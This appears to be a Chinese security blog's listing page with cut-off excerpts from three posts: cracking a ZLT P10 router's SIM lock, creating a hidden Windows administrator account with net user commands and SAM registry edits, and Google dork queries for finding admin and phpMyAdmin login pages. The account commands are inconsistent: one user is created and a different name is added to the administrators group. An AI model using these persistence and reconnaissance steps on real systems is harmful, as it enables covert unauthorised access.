- Hack -
记录一次破解 ZLT P10 CPE 的过程 (超级简单, 而且运气好)
记录一次破解 ZLT P10 CPE 的过程 (超级简单, 而且运气好)
搞安全运气不好不行
*
这个CPE是在2020年花了19RMB在老王家入手的…..当时拿到后插卡,万能密码admin*2进后台提示请插入对应SIM卡….然后就吃灰了,现在睡不着拿出来试试能不能破解他的锁卡,能刷OpenWrt那当然更好了……
本来想了各种方法,结果这么简单
配置
这个放到进入TTY后再讲
0.信息收集
恩山只有一篇求救贴也是锁卡, XDA发现同公司的
ZLT P
制作隐藏的管理员账户
如何创建隐藏的administrator账户
0.创建管理员用户zhou
net user zhou 123456h /add
net localgroup administrators Waldo /add
1.添加超级隐藏管理员账户
net user Ascotb$ 123456 /add
net localgroup administrators Ascotb$ /add
2.制作注册列表
但在管理账户面板依然能够看见,下面要解决这个问题在注册表
HKEY_LOCAL_MACHINE\SAM\SAM
渗透中超全的Google hack语法分享
对于很多刚刚学完漏洞原理和基础的同学,不知道如何挖掘漏洞,分享下一些超全的谷歌语法,和一些常用姿势
祝各位早日拿到SRC证书
大全:
inurl:Login 将返回url中含有Login的网页
intitle:后台登录管理员 将返回含有管理员后台的网页
intext:后台登录 将返回含有后台的网页
inurl:/admin/login.php 将返回含有admin后台的网页
inurl:/phpmyadmin/index.php 将返回含有phpmyadmin后台的网页
site:http://baidu